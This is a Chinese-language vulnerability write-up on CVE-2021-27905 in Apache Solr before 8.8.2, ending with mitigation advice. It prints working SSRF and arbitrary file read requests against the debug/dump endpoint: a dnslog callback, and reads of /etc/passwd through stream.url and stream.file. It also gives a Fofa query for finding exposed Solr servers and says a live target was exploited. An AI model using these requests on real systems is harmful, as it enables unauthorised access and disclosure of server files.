CVE-2021-27905:Apache Solr SSRF And Arbitrary file read

2021-07-21 17:12:22 浏览数 (1)

影响范围

Apache Solr < 8.8.2

漏洞类型

SSRF漏洞

利用条件
  • 影响范围应用
  • 存在至少一个core
漏洞概述

2021年3月17日,有安全研究人员称在Apache Solr 8.8.2版本之前存在SSRF漏洞和任意文件读取漏洞,攻击者可以利用该漏洞进行SSRF攻击或者读取服务器端任意文件,危害较大,建议用户升级到最新的安全版本。

漏洞复现

在这里我们直接通过Fofa检索一个目标来进行漏洞复现:

Step 1:首先我们通过主界面的Core Admin选项卡来获取当前的Core名称:

Step 2:之后结合之前的Core name构造以下请求发起SSRF测试

代码语言:javascript复制
http://x.x.x.x:8983/solr/records/debug/dump?stream.url=http://vlpasp.dnslog.cn&param=ContentStream

之后可以在本地的DNSlog平台看到以下回显效果:

Step 3:之后构造以下请求来读取服务器端的/etc/passwd文件信息

代码语言:javascript复制
http://x.x.x.x:8983/solr/records/debug/dump?stream.url=file:///etc/passwd&param=ContentStream

当然,也可以通过第二种方式读取:

代码语言:javascript复制
http://x.x.x.x:8983/solr/records/debug/dump?stream.file=/etc/passwd&param=ContentStream
目标检索

Fofa:

代码语言:javascript复制
app="APACHE-Solr"
安全建议

1、开启身份验证/授权,参考官方文档:

https://lucene.apache.org/solr/guide/8_6/authentication-and-authorization-plugins.html

2. 配置防火墙策略,确保Solr API(包括Admin UI)只有受信任的IP和用户才能访问

参考链接

https://issues.apache.org/jira/projects/SOLR/issues/SOLR-15124?filter=allopenissues

0 人点赞